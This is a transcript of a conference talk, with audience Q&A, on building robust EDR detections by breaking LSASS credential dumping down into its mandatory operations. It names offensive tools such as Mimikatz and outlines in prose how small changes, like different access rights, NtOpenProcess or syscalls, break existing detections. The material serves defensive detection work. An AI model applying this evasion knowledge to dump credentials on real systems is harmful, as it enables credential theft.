Watch: Building Robust Detections Through Tradecraft Decomposition

About Matt Hand & Prelude

Thanks for coming. I'll skip through the majority of this. I work at Prelude. We work on threat management, just trying to make sure that EDR works the way that it does or the way that you would expect it to when you need it to.

I'm here today to talk about robust detections, specifically focused on technique stuff. How many detection engineers are here, just by a show of hands? A handful, OK.

Well, hopefully we can convince you guys that there may be a simpler way of approaching detection engineering that kind of pushes away a lot of the noise.

So we have to have a bit of a reality check here for a second. Anyone who's worked in incident response, offensive security, like I used to, or really any aspect that deals with confronting incidents directly knows that, adversaries have more tools at their disposal than ever.

The reality of our situation

2019 was the year of the C2. We went from, you know, a handful to feeling like hundreds, a bunch of different offensive tools up on GitHub, things that I've written live there. This is only getting worse now. The barrier to entry for capability development used to be relatively high. You used to be able to write code, test code, understand internals, and understand tradecraft.

Now, if you can handle just the code generation aspect, it becomes much easier. We have a copilot that's trained on GitHub data where all of our offensive tools live. So, the ability for an adversary to begin capability development is now more possible than ever. And then when they have these tools and they get caught, trivial modifications to them are very, very frequent.

We see hundreds of different variations of something. As trivial as changing from Mimikatz to Mimidogz. It's as simple as that and it breaks production detections today. Unfortunately, when you start getting into more nuanced things like instruction manipulation, it gets even worse, and then things start falling apart really, really quickly. What this leads to is frankly, what I view as low-skill threat actors, e-crime operators, ransomware as a service people, that are just kind of throwing stuff at a wall until something sticks.

Red team operators, pentesters—they're winning today more frequently than not—and that's not okay. Especially when the stakes are as high as they are today. Then imagine now, what a really advanced adversary can do with actual apex or nation-state capabilities. It's a bit of a different paradigm. So, our strategies for detection today, I think, are fundamentally broken or how we build detections today. I want to talk to you about why that is and what we can do about that.

Here's a map of all of the behaviors exhibited by a garden variety credential dumper. If you've ever done reverse engineering for an entire piece of malware, don't worry, this isn't the interesting part, but this is just a summary of how complex these systems get. This is everything from:

I deliver a payload to
I have your credentials.

That's it.

Just run a thing, give me your password. That's an insane amount of information. Has anyone even been able to read all of the boxes on the slide yet? Like, that's insane. That's not useful, which is the bigger problem.

So, the root of the problem is when we're looking at malware, when we're looking at tools, I don't think we're asking the right question in the first place. We spend so much time focused on what the code looked like,

when it was delivered. Questions like:

What was the file extension and did they nest the files and all that
How was it obfuscated?
What packer did they use?

All of these different things that resulted in code being executed are in our purview for detection. Does that really matter? Do we care how that shellcode got into memory? Sure, in certain cases.

Who here does actual attribution with the ability to actually impose costs, right? Like who works for the FBI is really what this boils down to. If you're not actually doing attribution, like, cool, get that data. But is that what you should be focusing your five detection engineers that are holding up your entire security program on their shoulders? Probably not, right? So it's arguably just not applicable for a majority of cases. Why are we focusing on it? Because it's interesting, surely. But is it useful?

We should be asking instead, what behaviors did that malware or tool exhibit? That's not a controversial detection. Behavioral detections have been around for my entire career. So if you're on 15 years now, that's not a controversial point, but we've strayed so far to not box or scope our definition of behavior well enough. Everything that comes before and after the execution of the technique.

So if we go back to here, our credential dumper, if we're focused on detecting credential dumping, that's the only thing that matters. This second to last line, that's credential dumping. That's what we're building the detection off. Let's focus on that. Let's not worry about what shell code loader, and what packer and all that. That's interesting, but not useful. So here is my thesis. Very little about a technique actually matters when you're building robust detections.

Practical example

That's the entire premise of this talk: That very little of anything that we look at today truly matters when we're trying to build a detection to catch greater than one version of a thing. And by identifying whatever these basic attributes are, we can focus our efforts on those, make meaningful change, and build strong, effective detections that are resilient in a changing environment.

So sticking with the credential dumping theme, we're going to use a tactical example of OS credential dumping from LSASS.

Who here has used Mimikatz before running a Mimikatz? Pretty common, right? The whole gist of it is that: if I can get a handle to LSASS, a local security authority subsystem service, LS mix setup process, I can read its virtual memory and extract credential materials from it. Pretty common. Everybody and their mother have done it.

Every threat actor that I can think of does some version of this, but native Windows facilities, custom written tools, C2 frameworks, there are so many different variations of doing this, that it's pretty much like the canonical example of somebody did a bad thing. So we use this.

Here is some available public tooling to do this. There may be some familiar names there, right? We see Mimikatz, that's the canonical example. There are 28 in this list. There are 28 because I gave myself a 30-minute timer to name as many tools off the top of my head as I could. Again, I'm a red teamer by trade. These are things that I use. I got maybe a little bit more keyed in, but 28 in 30 minutes from just Google searching and memory. That's insane.

Are these all actually different ways to dump credentials from LSASS? I don't think so. So why are there so many?

Well, what happens when you are doing malware development, tooling development—you have to adapt to stress. So anyone who's ever done athletic stuff, that graph right there should look pretty familiar. That's a stress recovery adaptation cycle. You introduce a stressor that hurts you, and then you adapt to that stressor and you produce something that's better and you do that iteratively. That's how you get stronger. All things in security tie back to biology.

So, Mimikatz in this example is pretty much the new EICAR test string. Like if you drop Mimikatz on a box and it doesn't get caught, something is horrifically wrong. So we have to have a different version of Mimikatz. The stress of endpoint protection required an adaptation to our strategy for dumping credentials from LSASS. So to change this, these are only minor changes to the logic of the program that will get around detection strategies today.

Again, we're so specific on a common Mimikatz detection strategy is to flag on the process rights that are requested on a call to open a process. Pretty garden variety of Mimikatz detection. Well, what if I request something different? It completely falls apart.

So we can just change little tiny things about Mimikatz or another example to break detections. But then that's just the face-value stuff. It goes so much deeper than that.

We can add or remove functionality to change down the size and code flow of the sample, we can swap function calls—like who remembers the whole syscall thing that happened a couple of years ago? That's all it is. It's just changing the entry point in the call stack. So it's not actually changing anything. You're still doing the exact same thing, just entering in a different thing.

Minor changes like this happen because they're very, very low cost. And if they're already low cost at human intervention levels—not to be like the AI bogeyman—but like that's what it's really good at. Like go to copilot, say:

Hey dude, give me five different ways to run this function.

And it says:

Here you go.

It's probably wrong, but it works in a case or two and it lowers the barrier to entry. Apparently, the barrier to entry for PowerPoint is too high for me. Let's see. There we go. So these changes don't cost a lot in terms of

time and effort. So they're very easy to do and adversaries have this low cost to implement these, so they can produce a ton of different samples, which is how we end up with those 28.

So when we're looking at that crazy graph that I showed, right? And we're saying like, this is just too much. We need to just take a step back and redefine the behaviors that we would expect out of a credential dumper. But to do that, we actually run into an issue with ATT&CK.

Expanding ATT&CK

Who here has heard of ATT&CK before?

Common way of referencing any kind of adversary tradecraft. Many different opinions on its usefulness, but I think we can all generally agree that if I say OS Credential Dumping from LSASS, and there's a more canonical way of referencing that, it's useful.

ATT&CK works on a three-tier system: tactics, techniques, and procedures. Procedures are the lowest level description of doing it.

So, a technique would be OS credential dumping. But when we need to describe tradecraft, we end up going lower because we don't have a sufficient degree of resolution for what we're actually trying to say. So if we're saying OS credential dumping from LSASS, there are many different ways to do that, as we'll talk about in a second. There has to be something lower than that. So we found that there are two layers.

Before Prelude, I worked at SpectreOps and the adversary detection team. They go on to coin the terminology: operation and function. This has been further publicized by Jared Atkinson, who's really pushing this as an idea. And I'm very, very thankful for that.

But, the operation is kind of the next step lower than a procedure, which is that high-level steps taken of: I need to open a handle to LSASS with sufficient privileges. It describes a step in a procedure. And the function is the specific way that you do that.

A procedure will have one or greater operations, and an operation will have one or greater functions. So the function is kind of that very specific of: Mimikatz calls open process with these writes.

That level of resolution—we already naturally do when we're reverse engineering malware or doing code review for open source tooling. We naturally think at that level. So that's what we do. When we look at these samples, we create these lists of functions. This describes the behavior of any of these tools. This is just the call stack. You're doing a code review to produce these.

So I have four samples right here that we'll just pick on for no real reason. It's just a relative sample size that we can work with to show similarity.

If we look at like each of the specific versions of this, this is a lot to recognize. SafetyKatz itself has 10 steps and all SafetyKatz does is run Mimikatz. That's it. There's really not a lot of difference in that. But it's still 10 different things that we have to catalog.

Like how would I build a detection for SafetyKatz? Would I get it opening a handle to LSASS? Sure. That's a strategy. What about the call to Minidump, right? To create the dump file that is then parsed by the loaded version of Mimikatz. We write a detection for Mimikatz being loaded. That doesn't sound like a great strategy when we know that after 30 minutes of me sitting down, I could name one per minute. That's not a good use of your time. And then this permeates down to all the other things.

So then all the new tooling comes out. What happens if somebody drops something on Twitter right now and you have to build a detection for it? Like, what are you going to do? It's just, it's this never-ending thing.

And this is just one technique of the 700 and something that are in MITRE ATT&CK Enterprise V15—whatever they're on right now. This is a lot. So we need to simplify this even further. So functions are just naturally how we think when we're doing reverse engineering and when we are reviewing code for open-source tooling. They are overly specific though.

Simplification

They're so keyed in on the specific way that a tool does something or a specific way that a piece of malware does something—that slight variations in how we build our detection logic off of that can make our detections become brittle.

So an example of this is: people who build detections off function calls. If you built a detection off of a call to open a process, and an NT open process call happens. They're literally the exact same thing. There is no fundamental difference in this, but it will break your detection. It's too specific. We shouldn't be working at that layer.

So when we're looking for commonalities between these tools, again, the robust detection is catching more than one variation of a tool or a technique. It helps to summarize at the operational level, which is just one layer higher, closer to a procedure.

So that's what this looks like.

We can summarize the same four samples into, at most, eight very specific operations. So instead of saying like, well, we called open process with these flags or whatever to catch this thing, it doesn't really matter. It's obtain the handle to LSASS. That's all that really matters out of this. We drop some of the specificity for intentional generality, which then allows us to remove noise.

Removing noise

So what happens if we strip away all of the things that are not directly related to, or required for credential dumping in this example? Going back, we have: perform system checks as a common thing, resolve functions as a thing. Some of these operations, are shared amongst things, but are they actually required?

So we can minimize the set even further and say, well, this is the stuff that is actually required to dump LSASS.

The only things that are technically required are:

a handle to LSASS,
and a call to read its memory

Those are the only things that are truly required.

Depending on the way in which you read memory, there may be one or two small variations to it, but not a substantial amount. So in order to do this, we already had this minimized set. We took functions that came from the product of reversing. We summarize those and then we removed all of the nonsensical information that just isn't actually required.

So there are significant overlaps when we go back here to the mandatory operations that are common between samples. So each action in here leads to the next. It's an ordered set.Which creates a unidirectional graph, a graph that flows one way.

So if we can take those four samples and merge them into one graph that demonstrates control flow, it'll end up looking like this. Graphs are super cool. It's just like a nice logical way to think about things, but it actually represents the control flow of operations. So in our four samples, the commonalities between them were adjusting token privileges. The token privilege you need to dump credentials is debug privilege. You need to locate the process identifier for LSASS.exe, which is a requirement for the open process called to get a handle. And once you have a handle, you can then pass that to a function, which will read LSASS' memory. Pretty common flow, but this is the fundamental steps of how almost every credential number works. But even then, those can be qualified further. So why weren't all of those present in every tool?

Qualifying operations

Well, simply put, they're not actually required. So think of things that can be done outside of the specific sample. Can you derive LSASS's PID and pass it as a command line argument to a tool? Of course, that's how a good majority of them work.

Can you ensure that debug privilege is enabled for the token under the context that you're going to run the credential dumper? Of course, you don't actually have to check it. You can just say, "I assume that this is enabled." If not, I'm just going to fail.

Not a great development strategy, but a realistic one. This creates two different categories. There are mandatory operations (things that have to happen), and supporting operations, (things that can happen to facilitate the mandatory operation). So think: mandatory is you have to see this in the credential dumper. Supporting operations is: you likely will see this in the credential dumper. Does that make sense?

Nobody's asleep yet. This is good. Okay.

Action-oriented detection engineering

So we have 28 tools that we reduced down to just two mandatory actions. Obtain a handle to LSASS, read LSASS' memory. Those are the only two things that mattered for the credential dumper. This is intuitive. We know this already, but now we have a language to define it and we can build detection strategies off of it.

So now we have these actions or operations well-defined, now it becomes a game of: what can your EDR do about that?

So obtaining a handle to LSASS, it's a pretty common one. This is how most EDRs catch OS credential dumping: watch for a handle being open to a process object. If a process object matches the name LSASS.exe, then return to me the request and sometimes block it depending on the vendor. But that exists in pretty much everything today.

Some EDRs have a remote virtual memory read detection. If we have those in our EDR, we can say, well, I can catch it here on this mandatory operation, or I can catch it here. But which one would you choose? The trick to all of this is in that graph that I showed, what is the right-most node? What is the final action taken?

Is opening a handle to LSASS actually indicative of credential dumping? Of course not. It's just opening a handle to LSASS. You could do that in a benign sense. For some reason, Google Update Helper does that. So we have to write an exclusion. Does Google Update Helper read LSASS's memory, though? I really hope not. Not the legitimate version. It may. That would be terrifying.

So we have to pick one of them, just orient to the right-most, start there and then work your way back. And what that does is say like, this is the most indicative of the thing. If I don't have telemetry for that, go to the second thing. It's still a mandatory operation. So has to happen, but I can decide there that this is the best version of it.

Once you start going into supporting operations, the detection starts falling apart and then further down the track, then it starts really kind of falling apart like assuming that a file will be written because you do a Minidump write dump. Well, what happens if you use a callback in Minidump write dump and now all of a sudden it doesn't work? Focus right, and work your way backward as needed.

Validating with functions

So now that we have a detection strategy, we know right-most node and the mandatory operations category is our strategy, then we have to validate it. And this is where things get interesting and you really start finding out how weird offensive security tooling actually is and how similar everything is.

So if we classified everything into a family of saying like, credential dumping is comprised of these two or four parts, depending on how we want to talk about it. What are the unique expressions of those two or four things? And that's where you start creating these families. And these families are identified by how it achieved those operations. What functions specifically did it use?

So this may be to open a handle to LSASS. It may be a call to open process, or maybe a call to NT open process. It may be stealing a handle. It may be leaking a handle from the kernel. There are all of these different ways of doing that. Those are four different ways that I just named. And then reading virtual memory. It may be read process memory. It may be like a duplication or like a kernel, but it's an arbitrary read.

There are a bunch of different ways, Minidump, write dump, Minidump, write dump with a callback and so have you. These are all unique ways, unique functions that describe an operation. But when you catalog all of those and we go back to our original graph saying like, hey, these tools use these functions, you start finding that there's massive overlap. And what actually changes is the language that was used.

The evasion figurative crap stacking that tends to happen of like, "I'll just stack this ETW disable thing and then I'll use direct sys calls and then I'll turn off defender" and all that stuff. And then I'll do credential dumping. It's like that didn't matter at all. It's just nonsense that you stacked in here. Just ignore it. It's very safe to just ignore.

And then if we say, okay, well then I actually just use open process and Minidump, write dump. Well, so did these other 15 tools and you create these families.

And that becomes your validation set.

Those are unit tests for your detections. And now you have a strategy for validating these now robust detections that are built off of these mandatory operations. So wrapping this up, don't focus on the tool specifically when building technique or procedure-based detections.

If we have a general understanding of what the flow of a technique is, what is the mandatory operations that have to happen here? We can then say, "I don't care about the tools."

I'll build a detection for those operations and then validate with the tools later as a unit test. And then you could take all 28 that I named and run them through it. And then you wouldn't really see a difference. You just catch them because the operations are all the same. The functions are the only thing that are different.

And then when we're analyzing malware or any kind of tooling, just take a step a little bit below the procedure level. Don't go so deep that you naturally would when you're doing a code review or reverse engineering and say, you know, here are the specific functions that were used. That's too low resolution.

You want somewhere between procedure and function, which is naturally, operation. So just summarize operation in human language. Whatever makes sense to you, there's no agreed-upon language. MITRE is not going to extend ATT&CK to do this. This is all an idea that you keep in your head and just think, "I'm describing a technique and I'm looking at a sample that is comprised of functions." Let me summarize the functions into something that I can use.

Acknowledgments

So just two quick acknowledgements here. Two people have contributed greatly to my viewpoints on this and how I've grown to understand this as time has gone on, especially coming from a red team perspective. I'm used to breaking things and trying not to get caught. Now I'm really in the business of trying to catch everything that I broke.

Michael Barclay, a brilliant researcher on my team. He wrote a really cool tool called Cartographer that actually models all of this behavior. So he has Cartographer run as the website, but go poke around there and kind of see what this looks like in practice.

And then of course, Jared Atkinson. He has a blog series called On Detection that discusses these in an incredible amount of detail, the philosophy behind like why we think this way and some of the ways that we can think about this slightly differently.

Two brilliant researchers I'm very, very thankful for learning from.

But that's the end of the talk. I'm happy to answer any and all questions here or at our booth. Just as a quick note, we have a booth in the expo hall that I'm hanging out at all week. So if you want to come talk about this long form where questions in front of the room aren't really your forte, come meet us there. I'm happy to talk for however long you'd like to.

Question and answer

The first one is you said MITRE or ATT&CK wouldn't solve this necessarily. So I would, because these are, I believe, repeated things, like when you do it once, I believe you can share it with others. do we maybe need a framework that tries to solve this at a deeper level? And the second question is, like some of these stuff are out of the detection engineering hands. Like for example, these can be solved at an EDR level because they target specific telemetry that you cannot necessarily try to get or understand because the EDR abstracts it for you. So perhaps he says, I detect credential dumping, but you don't necessarily have the information. So I don't know, can we maybe distinguish between the consumer of the telemetry from the EDR and the detection engineer at the EDR level necessarily, if that makes sense.

Yeah, those are two really great questions. So the first one, and make sure I don't miss these, my train of thought's gonna go all over the place. So the first one was around, know, ATT&CK not really being adaptable to this. I don't necessarily think that it's impossible to adapt. I just think that it's not incentivized to do so. I agree, this is largely a one-time effort.

It does change operating system version, operating system version. That's kind of what my team does is that the research into this area. I agree that it's kind of a knowledge-sharing thing to a certain degree. And a big thing that I'm passionate about is like, researchers are really expensive, hard to find, and usually pretty prickly. Not everyone can afford or should have researchers. If someone's going to do the research, we should share it and make sure that people are able to do it.

That way the barrier to entry isn't your research ability, it's your ability to build a good detection in your environment. So I don't think MITRE will accept this because it's such a massive thing and it doesn't really hold true. They just add like financial theft as a technique and like what are the procedures of that, let alone like operations, like open a bank account. Like what am I gonna do about that? It doesn't matter. So it doesn't really apply to their model in general.

Maybe it is a different way of talking about it. Michael Barclay's Cartographer project is what we're kind of hedging on of just like having a way to discuss it. And if that's something you're interested into, contributions are very welcome there. But it's like the XKCD comics, this standard sucks. Let's build another standard five years later. This standard sucks. So I don't know if a new framework will solve it.

In terms of detection engineering, and decoupling that from the EDR, those are very real problems that we deal with. I'm not going to show my company too much here, but, we see where the EDR failure points are and they differ from vendors greatly. And at some point, you know, it's say SentinelOne, they use a lot of aggregate events. So saying like this event and this event mean this thing, but I can't see event A or event B, they just combine them all.

That's really tough to say like, well, what part did you see? That comes down to just kind of making a demand of your vendor and being like, hey, like I appreciate you doing this thing, but you've abstracted too much and just being vocal with your vendors and saying, hey, I actually need visibility into this data. And if they don't have it, you know, make noise. That's really the best that we have today. But yeah, I agree. It's a very sore point that I'm very invested in solving.

Hi, great talk. Completely agree with everything you're saying. I was curious about, because when you have like generic detection, like you mentioned quickly, like you also gonna have positive snack really. Yes. And things change and you have a big environment and like, there's a lot of weird things going on, right? So I'm thinking like, do you think the same type of reasoning can be used to create those like exclusions. So instead of like this specific, you know, Chrome, whatever you said, but could you do like the same or like, so it doesn't become too specific when it comes to handling those like whitelisting. Yeah. Like what was your view when it comes to handling that?

Exclusions are so dangerous just for the natural reasons of, know, as soon as you introduce an exclusion that's in the opportunity for a bypass. You whitelist a file and now all of sudden malware can masquerade as that. Those are legitimate problems. But what we found exploring this methodology is that by using these mandatory operations, the further right you go, the fewer false positives there are. So like Google Update Helper thing, right? Like that's opening a handle. You have to write an exclusion for it. Google Update Helper does not read memory.

So if you can build your detection around reaching memory or reading memory, there are fewer total events period for you to have to write exclusions on. So those exclusions become much more tolerable to have be specific. For the methodology of applying this side to what you exclude, I think it becomes tricky because the difference between a false positive and a true positive can sometimes be immeasurable. Like they may do the exact same thing and there's no real way to distinguish it, there's other attributes then that you look at of like, you know, was the calling binary sign?

Like what's the, like all the traditional things that you would do, but right now the exclusions are kind of a weak point of like, now we have to have complex joins and it just gets messy. But yeah, I'd be really interested to hear if anybody had thoughts on that specifically, cause that is a, it's a realistic part of the ecosystem right now. Thank you.

Dissecting Tradecraft: Building Robust Detections Through Tradecraft Decomposition

About Matt Hand & Prelude

The reality of our situation

Practical example

Expanding ATT&CK

Simplification

Removing noise

Qualifying operations

Action-oriented detection engineering

Validating with functions

Acknowledgments

Question and answer

Related content

Exposing the Gaps in Your Vulnerability Scans

Seeing Red: Why BAS is the Wrong Answer for Control Validation

A fireside chat with Matt Hand

Stop wondering how your EDR actually works